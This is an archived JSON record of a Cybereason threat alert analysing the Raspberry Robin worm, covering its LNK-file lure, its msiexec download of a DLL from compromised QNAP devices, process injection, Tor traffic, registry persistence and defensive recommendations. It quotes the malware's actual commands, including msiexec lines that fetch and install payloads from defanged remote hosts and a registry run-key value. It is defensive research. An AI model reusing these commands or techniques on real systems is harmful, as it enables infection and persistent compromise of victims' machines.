{
	"id": "4488b60e-2568-4a55-a278-56f51d91ec5d",
	"created_at": "2026-04-06T00:15:16.731229Z",
	"updated_at": "2026-04-10T13:12:28.642691Z",
	"deleted_at": null,
	"sha1_hash": "bc2cc197268c2cebd90962b5c0ed8d49f1943587",
	"title": "THREAT ALERT: Raspberry Robin Worm Abuses Windows Installer and QNAP Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2309678,
	"plain_text": "THREAT ALERT: Raspberry Robin Worm Abuses Windows Installer and QNAP Devices\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-05 20:06:34 UTC\r\nThe Cybereason Global Security Operations Center (SOC) Team issues Cybereason Threat Alerts to inform customers of emerging, impactful threats. The Alerts summarize these threats and provide practical recommendations for protecting against them.\r\nWhat's Happening?\r\nThe Cybereason team is investigating a series of recent infections with the Raspberry Robin campaign, also associated with the name “LNK Worm.” Raspberry Robin involves a worm that spreads over USB devices or shared folders, leveraging compromised QNAP (Network Attached Storage or NAS) devices as stagers. It uses an old but still effective method of using “LNK” shortcut files to lure its victims.\r\nKey Observations\r\nRaspberry Robin is a spreading threat, using specifically crafted Microsoft links (LNK files) to infect its victims. Cybereason observed delivery through file archives, removable devices (USB) or ISO files.\r\nRaspberry Robin is a persistent threat. Once the malware infects a machine, it establishes persistence by running at every system startup.\r\nCybereason observed a majority of the victims being located in Europe.\r\nThe Cybereason Defense Platform detects and prevents Raspberry Robin activities.\r\nAnalysis\r\nThis section describes the different processes we observed in Raspberry Robin infections. The following diagram represents the overall malicious activity seen in a Raspberry Robin infection chain:\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 1 of 12\n\nSummarized infection process for Raspberry Robin\r\nThe GSOC team summarizes a Raspberry Robin infection as follows:\r\nThe Raspberry Robin-related infections start from two files present in the same directory hosted on an external device or shared drive:\r\nan “LNK” file that contains a Windows shell command\r\nanother file that acts as a “BAT” file, filled with padding data and two specific commands\r\nRaspberry Robin leverages the LOLBin called “msiexec.exe” to download and execute a malicious shared library (DLL) from a compromised NAS device from the vendor “QNAP”.\r\nTo make it harder to detect, Raspberry Robin:\r\nleverages process injection into three legitimate Windows system processes\r\ncommunicates with the rest of Raspberry Robin’s infrastructure through Tor (The Onion Router) exit nodes\r\nTo persist on the infected system, Raspberry Robin uses a registry key to automatically load a malicious module through the Windows binary “rundll32.exe” at machine startup.\r\nInfection Process\r\nBased on public samples we analyzed (e.g. MD5 hash 22531e030b05dbaafe9932b8779c73f6), the initial set of two files can be present on an external storage device or simply in a compressed archive. It contains:\r\nAn LNK file (e.g. “USB Drive.lnk”), which is the initial infection trigger and contains the first “cmd.exe” execution, such as C:\\Windows\\System32\\cmd.exe\" /r tYPE xPhfK.Usb|CmD.\r\nAnother file, xPhfK.Usb, which contains random binary data as well as two commands, explorer.exe ADATA uFD and mSIExEC /Q -I\"hTTP://u0[.]pm:8080/80wOpGuotSU/USER-PC?admin\", to download and execute a second attack stage:\r\nExample content of the public sample 22531e030b05dbaafe9932b8779c73f6\r\nProcess cmd.exe taking the content of the “WYcZ.CFg” file as input to execute the process msiexec.exe, as seen in the Cybereason Defense Platform\r\nThe fact that the initial “cmd.exe” spawns from the “explorer.exe” process is the result of the LNK file’s execution.\r\nDownload and Execute\r\nThe initial infection vector launches “msiexec.exe” with a full malicious URL as an argument as well as “[/-]q” (quiet mode) and “[/-]i” (normal installation mode). Amongst the different attacks observed, the arguments are ordered differently and use different patterns, for example with or without a space.\r\nAn example pattern for this command is:\r\nmsIEXeC -Q/i \"\"htTP://6y[.]RE:8080/5CBniie70Rw/[Machine name]=[Victim user name]\" (where the machine name and victim name are replaced by actual values).\r\nAs the normal installation proceeds, the msiexec.exe command listed above creates another msiexec.exe /V process, launched from services.exe.\r\nThis second msiexec.exe /V process then spawns a third msiexec.exe process, which loads a malicious module named msi[...].tmp, the malware stage downloaded by its parent msiexec.exe /V process:\r\nProcess “msiexec.exe” downloading content from the domain “6y[.]re”, pointing to a compromised QNAP device, as seen in the Cybereason Defense Platform\r\nExtract from “https://www.shodan.io/host/195.158.67.252”, showing that the server “6y[.]re” resolves to is a QNAP device with a service hosted on TCP port 8080\r\nSpread Through Process Injection\r\nThe next step for this threat is to inject itself into other processes, namely “rundll32.exe,” “dllhost.exe” and “regsvr32.exe” on the observed victims. The Cybereason Defense Platform detects this injection and can help to link the creator process and the created ones.\r\nThe number of injected system processes is generally high (between 50 and 300) and some of these processes communicate with Tor (The Onion Router) exit nodes:\r\nRaspberry Robin injecting system processes, which then communicate with Tor-related IP addresses, as seen in the Cybereason Defense Platform\r\nPersistence\r\nRaspberry Robin installs itself into a registry “run” key in the Windows user’s hive, for example: “Hku\\[GUID]\\software\\microsoft\\windows\\currentversion\\runonce\\vayp” with value “RUNDLL32 SHELL32.DLL,ShellExec_RunDLLA REGSVR32.EXE /u -S \"C:\\Users\\[UserName]\\AppData\\Local\\Temp\\cnsbi.mh.\"”\r\nAs a result, “rundll32.exe” loads the same DLL as the one which the initial “msiexec.exe” process downloaded in the infection stage. It then proceeds with the same process injection and communication as described above.\r\nThe loaded DLL has a random extension (pi.loc, cr.mf, etc.) and “rundll32.exe” loads it with a “.” at the end:\r\nProcess tree showing the persistence mechanisms used by Raspberry Robin as seen in the Cybereason Defense Platform\r\nRegarding the persistence aspects, the following diagram represents the way the malicious module executes at each machine startup:\r\nRaspberry Robin persistence process following an initial infection and running at each machine boot\r\nAs the malicious module is the same one as during the initial infection process, it displays the same malicious activities involving process injection and communication with Tor exit nodes.\r\nThis module contains specific indicators, including the fact that it masquerades as an Apache shared library (DLL) called “libapriconv-1.dll”:\r\nRaspberry Robin leverages malicious module loading masquerading as Apache shared libraries (DLL)\r\nThe other samples the GSOC team identified in other Raspberry Robin cases also use different masquerading techniques (for instance, impersonating “QT 5”).\r\nThis specific module is also peculiar in that its certificate chain is broken, so it is signed but the signature is not verified by the Windows system. The code signing name is “OmniContact” and can be used as a filter on VirusTotal.com to check for similar samples.\r\nExcerpt from virustotal.com showing a sample’s detailed information\r\nIn 75% of the observed victims, the malicious module downloaded by Raspberry Robin was signed by “OmniContact.”\r\nNetwork Communications\r\nFinally, the victim devices of Raspberry Robin generated a high volume of network packets to Tor exit nodes. The GSOC team observed that the TCP ports used were 80, 443 and 8080.\r\nCybereason Recommendations\r\nThe Cybereason Defense Platform detects and prevents Raspberry Robin infections in Microsoft products. Cybereason recommends the following:\r\nBlock outgoing connections (outside of the organization) to Tor-related addresses, as Raspberry Robin actively communicates with Tor exit nodes.\r\nAs Raspberry Robin displays persistence mechanisms and establishes many masquerading actions on the infected system, re-image infected devices.\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting queries for detecting specific threats. To find out more about threat hunting and Managed Detection and Response with the Cybereason Defense Platform, contact a Cybereason Defender here.\r\nFor Cybereason customers: More details are available on the NEST, including custom threat hunting queries for detecting this threat:\r\nThe Cybereason Defense Platform detects the Raspberry Robin initial access method\r\nThe Cybereason Defense Platform detects the Raspberry Robin malicious module loading\r\nIndicators of Compromise (IOCs)\r\nLooking for the IOCs? Open the chatbot on the bottom right corner of your screen to access the Raspberry Robin IOCs.\r\nAbout the Researcher\r\nLoïc Castel, Principal Security Analyst, Cybereason Global SOC\r\nLoïc Castel is a Principal Security Analyst with the Cybereason Global SOC team. Loïc analyses and researches critical incidents and cybercriminals, in order to better detect compromises. In his career, Loïc worked as a security auditor in well-known organizations such as ANSSI (French National Agency for the Security of Information Systems) and as Lead Digital Forensics \u0026 Incident Response at Atos. Loïc loves digital forensics and incident response, but is also interested in offensive aspects such as vulnerability research.\r\nAbout the Author\r\nCybereason Global SOC Team\r\nThe Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on every continent. Led by cybersecurity experts with experience working for government, the military and multiple industry verticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive threats to support our mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle moves.\r\nSource: https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices"
	],
	"report_names": [
		"threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices"
	],
	"threat_actors": [],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775826748,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bc2cc197268c2cebd90962b5c0ed8d49f1943587.pdf",
		"text": "https://archive.orkl.eu/bc2cc197268c2cebd90962b5c0ed8d49f1943587.txt",
		"img": "https://archive.orkl.eu/bc2cc197268c2cebd90962b5c0ed8d49f1943587.jpg"
	}
}